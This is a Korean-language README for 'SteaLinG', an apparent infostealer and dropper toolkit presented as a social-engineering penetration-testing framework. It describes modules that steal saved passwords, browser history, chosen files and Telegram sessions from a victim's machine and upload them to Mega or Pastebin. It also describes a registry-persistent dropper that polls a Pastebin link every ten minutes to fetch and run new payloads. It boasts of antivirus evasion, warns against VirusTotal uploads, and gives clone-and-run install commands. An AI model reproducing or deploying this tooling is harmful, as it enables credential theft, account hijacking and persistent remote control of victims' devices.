
SteaLinG는 사회 공학을 위해 설계된 오픈 소스 침투 테스트 프레임워크입니다.
anonfiles.com이 폐쇄되어 코드를 수정했으며, 이제 결과를 mega.nz에 업로드합니다.
| 모듈 | 간단한 설명 |
|---|---|
| 비밀번호 덤프 | 저장된 모든 비밀번호를 훔쳐서 Mega - Pastebin에 업로드합니다. |
| 히스토리 덤프 | 브라우저 히스토리를 덤프하여 Mega - Pastebin에 업로드합니다. |
| 파일 덤프 | 원하는 확장자의 파일을 하드 드라이브에서 훔쳐 Mega에 업로드합니다. |
| Telegram 세션 하이재킹 | Telegram 세션 하이재커, Mega에 업로드합니다. |
| 드로퍼 | 아래 참조 |
| 모듈 | 간단한 설명 |
|---|---|
| 1-Telegram 세션 하이재킹 | Telegram 세션 하이재커 |
C:\Users\<PC 이름>\AppData\Roaming\Telegram Desktop
'tedata' 폴더 안에 있습니다.C:
└── Users
├── .AppData
│ └── Roaming
│ └── TelegramDesktop
│ └── tdata
이 폴더와 모든 내용을 동일한 경로의 내 장치로 이동한 후, 필요한 작업을 수행하기만 하면 됩니다. 도구가 모든 것을 처리하며, 여러분이 해야 할 일은 https://mega.nz/ 웹사이트에 이메일과 비밀번호를 제공하는 것뿐입니다. 첫 번째 단계는 tdata 파일의 위치로 이동한 다음 zip 파일로 변환하는 것입니다. Telegram이 정상적으로 작동 중이라면 이 오류가 발생하지 않습니다. 오류가 발생하면 Telegram이 열려 있다는 뜻이므로 프로세스를 종료해야 합니다. 이 동작이 악의적이라는 점을 알 수 있으므로 코드에서 try와 except를 사용하여 완전히 방지했습니다. 아카이브 파일의 이름은 피해자 장치의 이름을 사용합니다. 여러 장치가 있는 경우 구분할 수 있기 때문입니다. 그런 다음 이메일과 비밀번호를 사용하여 Mega 웹사이트에 zip 파일 업로드 요청을 제출합니다. 그게 전부입니다. 어떤 AV도 감지하지 못합니다.
| 모듈 |
|---|
| 2- 드로퍼 |
.exe 또는 .png 또는 다른 중요한 확장자여야 합니다. 중요한 것은 링크가 확장자로 끝나야 한다는 것입니다.
두 번째는 API 키를 얻는 것입니다. 이 키도 제공해야 합니다. 등록하고 "API" 단어를 클릭하면 찾을 수 있으며, 사용자 이름과 비밀번호를 기록해 두세요.
먼저 웹사이트에 비공개 paste를 만듭니다. 그런 다음 제공한 URL을 추가하고 실행 파일(exe)을 제공합니다. 이 파일의 기능은 어떤 장치에서 실행될 때 두 가지 방법으로 장치의 레지스트리에 자신을 추가하는 것입니다.
첫째, Pastebin 웹사이트를 열고 만든 특수 paste를 삽입합니다. 그런 다음 paste URL을 가져와 내용을 다운로드하고 실행합니다. 또한 언제든지 다른 URL을 입력할 수 있습니다. 드로퍼는 10분마다 URL을 확인하므로 매우 정상적인 동작입니다. 새 URL을 찾으면 내용을 다운로드하고 연결하여 계속 실행합니다. 여러분은 아무것도 할 필요가 없습니다. 따라서 10분마다 어디서든 장치에 액세스할 수 있습니다.
3- Linux 지원
4- 이제 Mega 또는 Pastebin 중에서 선택할 수 있습니다.
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python3 -m pip install -r requirements.txt
python SteaLinG.py
* VirusTotal.com에 업로드하지 마십시오. 이 도구는 시간이 지나면 작동하지 않습니다.
* VirusTotal은 AV 회사와 서명을 공유합니다.
* 다시 한 번 말하지만, 바보가 되지 마십시오!

